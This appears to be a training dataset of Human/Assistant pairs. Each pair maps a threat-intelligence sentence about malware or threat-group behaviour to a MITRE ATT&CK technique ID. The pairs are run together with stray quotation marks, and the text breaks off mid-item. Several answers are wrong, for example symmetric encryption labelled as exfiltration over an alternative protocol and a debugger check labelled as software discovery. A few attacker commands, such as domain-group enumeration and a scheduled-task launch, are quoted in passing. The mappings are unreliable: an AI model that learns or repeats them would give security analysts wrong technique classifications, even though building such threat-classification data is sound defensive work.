Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind can execute commands via an interactive command shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor can support windows execution via SMB shares.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD has been executed via malicious e-mail attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has used FTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Night Dragon has obtained and used tools such as gsecdump.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In a later variant, randomly generated data was used for data overwrites.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is because sudo has the ability to cache credentials for a period of time.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D can use the touch -t command to change timestamps.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Linux has a hardcoded location under systemd that it uses to achieve persistence if it is running as root.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the Duqu command and control is operating over HTTP or HTTPS, Duqu uploads data to its controller by appending it to a blank JPG file.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rover automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete's collected data is exfiltrated over the same channel used for C2.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanHaiShu uses DNS for the C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used ipconfig, Ping, and tracert to enumerate the IP address and network environment and settings of the local host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa’s JavaScript file used a legitimate Microsoft Office 2007 package to side-load the OINFO12.OCX dynamic link library.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 used an HTTP malware variant and a Port 22 malware variant to gather the hostname and CPU information from the victim’s machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Benign executables used to side-load payloads may not be flagged during delivery and/or execution.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,H1N1 kills and disables services for Windows Firewall.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We mentioned earlier that due to the nature of the IE injection technique used by the HTTP-based backdoors, a number of C2 commands were cached to disk### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax has decoded and decrypted the configuration file when executed.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Babuk has the ability to use the command line to control execution on compromised hosts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky checks for the existence of anti-virus.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN uses WMI to check for anti-virus software installed on the system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This same attack could be executed using service tickets captured from network traffic.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET will create an ssh key if necessary with the ssh-keygen -t rsa -f $HOME/.ssh/id_rsa -P command.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By default, only Administrators may remotely activate and launch COM objects through DCOM.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In one instance, a log file recovered from an open indexed server revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dridex's strings are obfuscated using RC4.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot embedded the commands schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I inside a batch script.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Explosive has used HTTP for communication.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It’s important to remember, that while we were using Bitly links to help gauge click location, anyone who clicks these links (including researchers) are also counted### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used brute force techniques to obtain credentials.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also deleted previously-created Image File Execution Options Debugger registry values and registry keys related to HTTP proxy to clean up traces of its activity.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MobileOrder has a command to upload to its C2 server information about files on the victim mobile device, including SD card size, installed app list, SMS content, contacts, and calling history.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher probes the system to check for antimalware processes.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot can modify registry entries.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet uses encrypted configuration blocks and writes encrypted files to disk.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One of the malware families tied to this group, BADNEWS, continues to be updated both in how it uses dead drop resolvers, as well as how it communicates with a remote C2 server### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used valid VPN credentials to gain initial access.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Keydnap uses a Launch Agent to persist.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has encrypted documents with RC4 prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used Google Chrome bookmarks to identify internal resources and assets.### Assistant: T1217: Browser Bookmark Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The autonomous system name of the IP shows that the allocation is controlled by Serverius Holding B.V., which is an autonomous system name we have previously seen associated with the OilRig group### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doki has disguised a file as a Linux kernel module.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,4H RAT uses HTTP for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bonadan has discovered the OS version, CPU model, and RAM size of the system it has been installed on.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has discovered the local network configuration with ipconfig.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist can execute shell commands on a compromised host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can direct BACKSPACE to execute from the command line on infected hosts, or have BACKSPACE create a reverse shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emissary is capable of configuring itself as a service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious modifications to network devices to enable traffic redirection may be possible through ROMMONkit or Patch System Image.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It can also run with ShellExecute.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JHUHUGIT has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also searches for ICS-related software files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Drovorub can delete specific files from a compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae can list files and directories on a compromised host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang performs discovery of permission groups net group /domain.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat has installed shim databases in the AppPatch folder.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used scripts to detect security software.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has been observed adding the downloaded payload to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key to maintain persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has changed extensions on files containing exfiltrated data to make them appear benign, and renamed a web shell instance to appear as a legitimate OWA page.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa sent the victim computer identifier in a User-Agent string back to the C2 server every 10 minutes.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest can download and execute payloads in-memory or from disk.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process /Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,zwShell can obtain the victim PC name and OS version.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ragnar Locker has used regsvr32.exe to execute components of VirtualBox.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Calisto uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has connected to C2 servers via HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Next, the buffer is encrypted using the RC4 algorithm with the 50-byte key (also stored in the backdoor’s body)### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 used HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy has used Systeminfo to gather the OS version, as well as information on the system configuration, BIOS, the motherboard, and the processor.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SodaMaster can use RegOpenKeyW to access the Registry.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAMMERTOSS has used -WindowStyle hidden to conceal PowerShell windows.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can steal cookie data and credentials from Google Chrome.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID.### Assistant: T1111: Two-Factor Authentication Interception" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,zwShell has been copied over network shares to move laterally.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson can capture webcam video on targeted systems.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used tools to identify if a mouse is connected to a targeted system.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has run a tool that steals passwords saved in victim email.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GuLoader has the ability to perform anti-VM and anti-sandbox checks using string hashing, the API call EnumWindows, and checking for Qemu guest agent.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used PowerShell to add and delete rules in the Windows firewall.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Netwalker can detect and terminate active security software-related processes on infected systems.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can save encryption parameters and system information to the Registry.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WIRTE has used HTTP for network communication.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As security controls have improved, DLL side loading has evolved to load a payload stored in a different directory or from a registry value### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist has the ability to upload files from a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony has used the Adobe Reader icon for the downloaded file to look more trustworthy.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linfo creates a backdoor through which remote attackers can change C2 servers.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT10 spear phishes have been relatively unsophisticated, leveraging .lnk files within archives, files with double extensions (e.g### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FrameworkPOS can identifiy payment card track data on the victim and copy it to a local file in a subdirectory of C:\Windows\.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Thrip used a cloud-based remote access software called LogMeIn for their attacks.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rover automatically collects files from the local system and removable drives based on a predefined list of file extensions on a regular timeframe.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VBScript #1 The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can gather victim internal and external IPs.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound malware has obtained the victim username and sent it to the C2 server.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pay2Key can stop the MS SQL service at the end of the encryption process to release files locked by the service.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the ""ccache"".### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This command would inject an import table entry consisting of the specified DLL into the module at the given base address.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control infrastructure.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN can enumerate drives and their types.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Metasploit reverse HTTP payload was configured to communicate with the command and control (C2) IP address 176.126.85[.]207 with a randomly named resource such as” over TCP port 443.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT can download files to the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has the capability to enumerate services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack can collect the victim's computer name, hostname and adapter information to create a unique identifier.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments.### Assistant: T1199: Trusted Relationship" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 executed CHOPSTICK by using rundll32 commands such as rundll32.exe “C:\Windows\twain_64.dll”.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also used tunneling tools to tunnel RDP into the environment.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MirageFox is likely loaded via DLL hijacking into a legitimate McAfee binary.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 used spearphishing with Microsoft Office attachments to target victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSInfo has enumerated the local administrators group.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework., LoadLibrary ### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pisloader obfuscates files by splitting strings into smaller sub-strings and including ""garbage"" strings that are never used.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By chance encounter, victims may directly download/install these backdoored files via User Execution.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke copies and exfiltrates the clipboard contents every 30 seconds.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as Bash History and /var/log/*.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito establishes persistence under the Registry key HKCU\Software\Run auto_update.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EnvyScout can collect sensitive NTLM material from a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI has used a custom base64 key to encode stolen data before exfiltration.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets or Search Victim-Owned Websites.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group delivered RATANKBA to victims via a compromised legitimate website.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Enumerating the SAM database requires SYSTEM level access.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used net group ""Domain Admins"" /domain to identify domain administrators.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Secure Shell is a standard means of remote access on Linux and macOS systems.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NDiskMonitor can obtain a list of all files and directories as well as logical drives.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT34 can download remote files onto victims.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may directly access a volume to bypass file access controls and file system monitoring.### Assistant: T1006: Direct Volume Access" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unknown Logger is capable of stealing usernames and passwords from browsers on the victim machine.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has sent data over HTTP if FTP failed, and has also used a fallback server.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT uses WMI to query the Windows Registry.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Trojan will then read the hexadecimal formatted contents of this file in 1500 byte blocks, sending each 1500 bytes of data from the file to the C2 server via an HTTP GET request to a URL with the following structure:http:///resp?AAZ The upload command (2) writes data provided by the C2 to a specified file### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to get a listing of cloud accounts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Then it checks to see if it was launched by RUNDLL32.exe along with parameter #1### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST strings were compressed and encoded in Base64.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar can sleep for a specific time and be set to communicate at specific intervals.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT can use a custom DGA to generate a subdomain for C2.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The servers use a different static key to encrypt replies to the implant.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It appears to us that one organization had its entire Active Directory dumped out, making up most of the credentials we found in the data dump### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use RSA asymmetric encryption with PKCS1 padding to encrypt data sent to the C2 server.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to get a listing of email addresses and accounts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged. ### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,All protocols use their standard assigned ports.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Utilities and commands that acquire this information include netstat, ""net use,"" and ""net session"" with Net.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke downloaded a file ""libprocesshider"", which could hide files on the target system.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat can impersonate Windows services and antivirus products to avoid detection on compromised systems.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As seen below, the relational analysis proved to be quite fruitful: Figure 1 Overview of relationships We rapidly discovered a different set of tools communicating to the exact same C2 servers as those two Word documents, in addition to other tools communicating to other subdomain variations of chrome-up[.]date as seen in the following graphic: Figure 2 Command and control overlaps From there, we were able to map out a large infrastructure separating out into four categories of tools: downloaders, droppers, loaders, and payloads### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron has the ability to download and execute additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail can be delivered as a compressed, encrypted, and encoded payload.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER malware has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used AdFind to enumerate remote systems.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance or Search Open Websites/Domains, establishing operational resources or Compromise Accounts, and/or initial access or Trusted Relationship.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Among them, we found variations on the EternalDarkness SMBv3 exploit 